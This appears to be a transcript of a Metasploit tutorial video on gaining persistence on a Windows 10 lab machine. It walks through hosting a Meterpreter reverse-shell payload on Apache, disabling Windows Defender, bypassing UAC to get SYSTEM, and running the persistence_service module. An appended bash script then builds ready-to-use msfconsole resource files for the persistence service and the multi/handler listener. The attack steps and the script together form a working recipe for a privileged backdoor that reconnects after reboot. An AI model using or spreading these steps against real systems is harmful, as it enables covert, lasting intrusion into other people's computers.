Welcome back. In this video, I want to talk about something called persistence. What is persistence? Well, persistence is a module that allows us to stay on the target machine even after the target machine gets rebooted. So it is essentially adding our payload to the startup folders, where it will automatically get started as soon as the target system gets restarted. It is a part of maintaining access, so this is one of the things that we want to do as soon as we get on the target machine.

What I did right here is establish a Meterpreter session with the target machine. I used this module to bypass UAC and get system privileges on my Windows 10 virtual machine. The reason why I'm testing this on a virtual machine is because in this video I will have to restart this machine to see whether the persistence is working. And how did I transfer the shell.exe to the Windows 10 machine? Well, I used the old way of transferring it, using the Apache web server. To do that, you can just type systemctl start and then apache2. This will ask you for your password; put it right here, and this will start the Apache web server. Now what you can do is open up Internet Explorer on the target machine and type in the IP address of your Kali Linux, which will lead you to the web page of our Linux machine.

Now, you will see this shell.exe right there. It is there because I put the payload inside of the web server directory. To do that inside Linux, after you create the payload, you can navigate to the /var/www/html directory, where you should have two files called index and then dot something. You can delete those files and copy your payload to this html directory right here. Then, if you go to your Windows 10 machine and refresh the page, you will have your shell.exe available to download on your Windows 10 machine. Just make sure that you disable Windows Defender on your Windows 10 machine, because we're using a regular Meterpreter reverse TCP shell and it gets detected by Windows Defender. After you do all of that and establish the connection, you can then gain system privileges, and we already know how to do that. We simply just test a bunch of those modules that are used to bypass UAC, and then we become the system-level account.

Once you do all of that, it is time to run the persistence module. So how can we do that? Well, first of all, I background this session, and if we type sessions, you can see I have two sessions available. One is on the regular user account, and the one that I elevated is this system-level account.

So what I want to do to run the persistence is type search persistence inside of my Metasploit framework. This will output a bunch of different modules, and the one that we're going to cover in this video is going to be this one right here: exploit/windows/local/persistence_service. If I copy the module name, go down here, type use, paste the module and press Enter, it will set my payload to windows/meterpreter/reverse_tcp. If I type show info here, we can see that this module will generate and upload an executable to the remote host. Next, it will make a persistent service: it will create a new service which will start the payload whenever the service is running. Admin or SYSTEM privilege is required for this module to run. That is why we created the second session with system privileges.

So what we need to specify right here in the options is the session, and here we are going to set the session with the system-level account. In my case, I believe it is session 2. That is correct. And right here, we want to set our payload options. Of course, if we want to, we can set these other options as well, such as RETRY_TIME, and RETRY_TIME is simply just the time that we wait before trying to connect again if the connection fails. Five seconds is the default. Now, we can set that to be, for example, ten seconds. It doesn't have to be five; that would be too quick. After we do all of that, we can run this module: press run, and this will open session 3. If I type getuid, we will be the system-level account. But what is special about this session is that it will automatically connect back to us even after the target machine is rebooted. So the target won't need to run this shell. After the system is restarted, it will automatically connect back to us again because we ran this persistence module.

Let me show you what I mean. If in my Meterpreter session I run the reboot command and press Enter, this will start restarting the Windows 10 machine. All of the other sessions will die out because the connection has been closed. If I Ctrl+C, exit out of this and type sessions, we will have no active sessions anymore. So what we can do right now is type use exploit/multi/handler, set the correct payload, and inside of show options we want to set the correct options that we used inside of our persistence module. That is the port 4444 and the IP address of our Kali Linux machine. So all I need to do right now is type run.

And here we get the session opened, because this machine hasn't yet shut down, so we're just going to close this because this is not the session that we wanted. I'm going to manually shut down this machine and go and start it once again. Now that the machine is getting started up, I will run our listener. If everything worked correctly, we should get a Meterpreter session opened as soon as the machine boots up, without the target having to do anything but start their machine. So let's see whether it will work. The machine is currently starting up; let's give it a few seconds. And here it is: a Meterpreter session 5 opened on its own, and notice that it didn't even log in to the user yet. The best part about this is that if we type getuid, I will already be the system-level account, so I didn't have to go through the privilege escalation process again. This Meterpreter session opened without anyone clicking on anything, and that is the good part about persistence. Now, even if the target shuts down this PC once again and starts it in a week or two, our persistence will still work and our payload will automatically connect back to our Kali machine, if the IP address of the Kali machine hasn't changed.

Of course, one more thing to keep in mind is that sometimes persistence can be buggy, so it is known not to work sometimes, but in most cases it should work. And if it doesn't, there are other modules for persistence as well. If I type background and search persistence, I used this module right here, but you can see there are other modules as well. You can check them out if you want to; maybe they will work better, maybe they will suit your needs more. But whichever one you find works, just use it and you will maintain access on the target system.

Great. Now that we covered persistence, in the next video we're going to cover the useful post-exploitation modules and a few more useful commands that we can run after exploiting the target. See you in the next video.
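As an added example that is not part of the video, the persistence workflow described above written as two Metasploit resource files, one for exploit/windows/local/persistence_service (run from the elevated session) and one for exploit/multi/handler (run after the reboot), plus a sanity check that both use the same PAYLOAD, LHOST and LPORT, which is the most common reason an implant "never calls back". The session number (2), LHOST (10.0.2.15), LPORT (4444) and RETRY_TIME (10) are assumed values for a lab, not taken from the video.

```shell
#!/usr/bin/env bash
# Builds msfconsole resource files for service-based persistence and the
# matching listener. Assumed lab values: session 2, LHOST 10.0.2.15,
# LPORT 4444, RETRY_TIME 10 (none of these come from the video).
set -eu

PAYLOAD="windows/meterpreter/reverse_tcp"

# Resource script that installs the persistence service from an
# Admin/SYSTEM Meterpreter session (the module refuses to run otherwise).
make_persist_rc() {
    local session="$1" lhost="$2" lport="$3" retry="$4"
    cat <<EOF
use exploit/windows/local/persistence_service
set SESSION ${session}
set PAYLOAD ${PAYLOAD}
set LHOST ${lhost}
set LPORT ${lport}
set RETRY_TIME ${retry}
run
EOF
}

# Resource script for the listener that must be up when the target reboots;
# ExitOnSession false keeps it listening across repeated reboots.
make_handler_rc() {
    local lhost="$1" lport="$2"
    cat <<EOF
use exploit/multi/handler
set PAYLOAD ${PAYLOAD}
set LHOST ${lhost}
set LPORT ${lport}
set ExitOnSession false
exploit -j
EOF
}

# Read the value of one "set KEY value" line from a resource file.
rc_option() { awk -v k="$2" '$1=="set" && $2==k {print $3}' "$1"; }

# Return 0 only when both files agree on PAYLOAD, LHOST and LPORT.
check_match() {
    local persist="$1" handler="$2" key
    for key in PAYLOAD LHOST LPORT; do
        [ "$(rc_option "$persist" "$key")" = "$(rc_option "$handler" "$key")" ] || {
            echo "mismatch on $key between $persist and $handler" >&2
            return 1
        }
    done
}

# Write persist.rc and handler.rc into a directory and verify they match.
build_all() {
    local dir="$1"
    make_persist_rc 2 10.0.2.15 4444 10 > "$dir/persist.rc"
    make_handler_rc 10.0.2.15 4444 > "$dir/handler.rc"
    check_match "$dir/persist.rc" "$dir/handler.rc"
}

if [ "${1:-}" = "--build" ]; then
    build_all "${2:-.}"
    echo "before reboot: msfconsole -q -r ${2:-.}/persist.rc"
    echo "after reboot:  msfconsole -q -r ${2:-.}/handler.rc"
fi
```

Usage: `./persist_rc.sh --build /tmp/lab` writes both files; feed persist.rc to msfconsole while the SYSTEM session is alive, then start handler.rc before the target comes back up. If you later change LHOST or LPORT in one file, check_match fails instead of letting you wait on a listener the implant will never reach.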